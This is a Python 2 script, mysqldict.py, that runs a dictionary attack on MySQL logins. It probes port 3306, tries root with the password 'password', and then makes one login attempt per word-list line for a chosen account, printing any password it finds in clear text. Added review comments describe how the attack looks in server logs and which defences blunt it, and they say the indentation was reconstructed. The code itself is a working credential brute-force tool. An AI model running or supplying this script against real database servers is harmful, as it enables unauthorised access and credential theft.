#!/usr/bin/env python
# mysqldict.py -- sequential MySQL login tester driven by a word list.
#
# Python 2 source: it uses print statements, the "except X, e" form and the
# file() builtin.
#
# NOTE(review): this copy lost its original line breaks and indentation. The
# nesting below is reconstructed from statement order and should be confirmed
# against the original file before relying on any comment about control flow.
#
# Modes, selected by sys.argv[1]:
#   -t HOST                          probe only: TCP connect to 3306, then one
#                                    login as root / "password" on db "test".
#   -h HOST -u USER -f FILE -d DB    the same probe, then one login attempt
#                                    per line of FILE for USER on DB.
#
# What this looks like from the server side (all visible in the code below):
#   * a bare TCP connect/close to port 3306, followed by a real MySQL handshake;
#   * one fixed login attempt with user "root", password "password", db "test";
#   * in -h mode, one new connection and one authentication per word-list
#     line, back to back with no delay, all for the same account and all from
#     the same client address.
# A burst of access-denied (1045) events for one account from one source is
# therefore the signal to alert on. Host-restricted accounts stop the script
# outright (its 1130 branches exit), and failed-login lockout or rate limiting
# blunts the one-guess-per-connection loop.
import sys
import socket
import os
import re
# First five characters of the interpreter version string; only used in the
# "MySQLdb is missing" message below (the name is reused later for other values).
var = sys.version[0:5]
try:
    import MySQLdb
except:
    # Bare except: any failure while importing MySQLdb lands here, not only
    # ImportError.
    print "For mysqldict.py to function you need to download MySQLdb for python version %s" % var
    print "Please visit: http://sourceforge.net/projects/mysql-python/ or use your package manager to install it."
    sys.exit(1)


def listhelp():
    """Print the usage text and exit with status 2."""
    # The usage text is kept exactly as this copy shows it; its internal line
    # breaks were not preserved.
    print """USAGE: ./mysqldict.py -h [TARGET] -u [USERNAME] -f [DICTIONARY FILE] -d [DB name] ##Attack Mode## ./mysqldict.py -t [TARGET] ##Test Mode#### -h{host}: Used for specifying the host you would like to perform the dictionary attack on. -u{username} Used for specifying the username you would like to use. -f{file}: Used for specifying the dictionary file you would like to use for the attack. -d{databasename}: Used for specifying the known database name of the MySQL database. -t{testmode}: Used for specifying if you would only want to test the target to see if it's susceptible to dictionary attacks. --help|-help: To display this help menu."""
    sys.exit(2);


# Argument handling is purely positional: only the argument count and the
# literal flags at fixed indexes are checked.
if len(sys.argv) < 3 or len(sys.argv) > 9:
    listhelp();
if sys.argv[1] == "--help" or sys.argv[1] == "-help":
    listhelp();
# re.match anchors at the start only, and the pattern has no end anchor and no
# octet range check, so any string that merely begins with four dotted digit
# groups skips name resolution and is used as given.
if not re.match('[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}', sys.argv[2]):
    try:
        # Resolve a host name once and overwrite argv[2] with the address, so
        # every later connection goes to that single resolved IP.
        sys.argv[2] = socket.gethostbyname(sys.argv[2])
    except socket.error:
        print "The domain name you've entered, %s does not appear to be valid!" % sys.argv[2]
        sys.exit(1)

###Test Module###
if sys.argv[1] == "-t" and sys.argv[2]:
    print "mysqldict.py:"
    try:
        # Plain TCP reachability check with a 0.5 s timeout. The socket is
        # closed again before MySQLdb opens its own connection.
        serverSocket = socket.socket()
        serverSocket.settimeout(0.50)
        # socket.connect() returns None on success and raises on failure, so
        # "not var" is always true when this line is reached.
        var = serverSocket.connect((sys.argv[2], 3306))
        if not var:
            print "Port 3306 on %s appears to be open.." % sys.argv[2]
            serverSocket.close()
            # Shadows the builtin open() for the rest of the module.
            open="true"
        if open == "true":
            try:
                # Fixed probe credentials: user "root", password "password",
                # database "test". A successful login prints nothing.
                db = MySQLdb.connect(sys.argv[2], "root", "password", "test")
                db.close()
            except MySQLdb.Error, e:
                print "A connection has been made and here are the results of the test:"
                # Only the first element of the exception args is inspected;
                # presumably the numeric MySQL error code -- confirm against
                # the MySQLdb version in use.
                e = str(e.args[0])
                # 1045 is MySQL's access-denied error: the server accepted the
                # connection from this address and evaluated the password.
                if re.match('1045', e):
                    print "This host is open to MySQL dictionary attacks!"
                    sys.exit(0)
                # 1130 is MySQL's "host is not allowed to connect" error: the
                # client address is rejected before any password is checked.
                elif re.match('1130', e):
                    print "This host does not allow remote administration on MySQL"
                    # On POSIX only the low 8 bits of an exit status survive,
                    # so callers see 106 here, not 1130.
                    sys.exit(1130)
                # 1049 is MySQL's unknown-database error.
                elif re.match('\(1049,', e):
                    print "The database name specified does not exist on the remote server but the password guessed is right!";
                    # Truncated to 25 on POSIX.
                    sys.exit(1049)
                else:
                    print """There was a problem and here's the error message: %s""" % e
                    sys.exit(255)
    except socket.error:
        print "Port 3306 on %s appears to be closed! Exiting!" % sys.argv[2]
        sys.exit(3)
###End of Test Module###
###The Main cheese######
# Attack mode requires all four flags in exactly this order and position.
if sys.argv[1] == "-h" and sys.argv[2] and sys.argv[3] == "-u" and sys.argv[4] and sys.argv[5] == "-f" and sys.argv[6] and sys.argv[7] == "-d" and sys.argv[8]:
    print "mysqldict.py:"
    try:
        # Same reachability check as test mode, with a shorter 0.15 s timeout.
        serverSocket = socket.socket()
        serverSocket.settimeout(0.15)
        var = serverSocket.connect((sys.argv[2], 3306))
        if not var:
            print "Port 3306 appears to be open on %s" % sys.argv[2]
            print "Now testing to see if the host is open for attack.."
            serverSocket.close()
        #Test the host to see if it's open for attack#
        try:
            # Same fixed root / "password" / "test" probe as test mode.
            var = MySQLdb.connect(sys.argv[2], 'root', 'password', 'test')
            var.close()
        except MySQLdb.Error, e:
            print "A connection has been made and here are the results of the test:"
            e = str(e.args[0])
            # The word-list loop only runs when the probe was answered with
            # access-denied (1045).
            if re.match('1045', e):
                print "This host is open to MySQL dictionary attacks! I am now continuing with a dictionary attack!"
                if not os.path.exists(sys.argv[6]):
                    print "The dictionary file you specified, %s does not exist" % sys.argv[6]
                    sys.exit(4)
                else:
                    # One candidate per line, surrounding whitespace stripped.
                    # Every iteration opens a fresh connection, so the server
                    # sees one authentication attempt per word-list line.
                    for i in file(sys.argv[6]):
                        i = i.strip()
                        try:
                            var = MySQLdb.connect(sys.argv[2], sys.argv[4], i, sys.argv[8])
                            var.close()
                            # The recovered password is written to stdout in
                            # clear text.
                            print "Host %s credentials are:" % sys.argv[2]
                            print "Successful authentication made! USER: %s and PASS: %s" % (sys.argv[4], i)
                            sys.exit(0)
                        except MySQLdb.Error, e:
                            # Here the whole exception is stringified, not
                            # just args[0] as in the probe above.
                            e = str(e)
                            # Unknown database (1049) is treated as a correct
                            # password with a wrong -d value. Every other
                            # error is ignored and the loop continues.
                            if re.match('\(1049,', e):
                                print "The username is %s and the password is %s, but the datebase name %s is wrong" % (sys.argv[4], i, sys.argv[8])
                                sys.exit(1049)
                    # NOTE(review): placement reconstructed; this reads as the
                    # word-list-exhausted message after the loop -- confirm.
                    print "Last password attempted was %s" % i
            elif re.match('1130', e):
                print "This host does not allow remote administration on MySQL."
                sys.exit(1130)
    except socket.error:
        print "Port 3306 does not appear to be open on %s" % sys.argv[2]
        print "Failed to even attempt dictionary attack."
        sys.exit(3)